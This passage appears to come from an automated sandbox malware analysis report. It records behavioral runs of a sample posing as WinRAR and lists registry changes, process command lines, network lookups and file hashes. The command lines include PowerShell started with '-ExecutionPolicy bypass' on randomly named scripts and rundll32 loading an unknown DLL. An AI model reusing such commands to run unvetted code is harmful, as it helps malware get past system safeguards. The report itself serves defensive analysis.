| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfh3qv3j.jxx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f7b00a2f9d88090175e4d5813473a969 |
| SHA1 | 2f84115c729095a86dc210459cf1f1ae66df9e24 |
| SHA256 | b42e656e842838b1e7140cf15d63ae73a06272f11b0ad4ead0ce8c58ff844fef |
| SHA512 | 5dc723cb8dab94ab7fcb9be43a641684461e112087b808f0ee00786467c3f85420dc85cd2044a77bc6017ec9caa67809cada0dfe0a06f8c19312b1726a57f96d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
memory/3176-68-0x0000000072E90000-0x0000000073640000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:22
Platform
win10v2004-20240226-en
Max time kernel
1714s
Max time network
1162s
Command Line
Signatures
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,1" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4044 -ip 4044
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 3128
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | notifier.rarlab.com | udp |
| DE | 51.195.68.172:80 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| US | 8.8.8.8:53 | 172.68.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
Files
Analysis: behavioral32
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:27
Platform
win10v2004-20240226-en
Max time kernel
1799s
Max time network
1897s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3444 wrote to memory of 2508 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 3444 wrote to memory of 2508 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3444 -s 328
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:53
Platform
win10v2004-20240226-en
Max time kernel
1760s
Max time network
1782s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2fc 0x31c
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dd1g0dnc.veq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral9
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:53
Platform
win7-20240221-en
Max time kernel
1795s
Max time network
1819s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win7-20240215-en
Max time kernel
1562s
Max time network
1569s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1
Network
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:53
Platform
win10v2004-20240226-en
Max time kernel
1755s
Max time network
1802s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1420 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4032 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
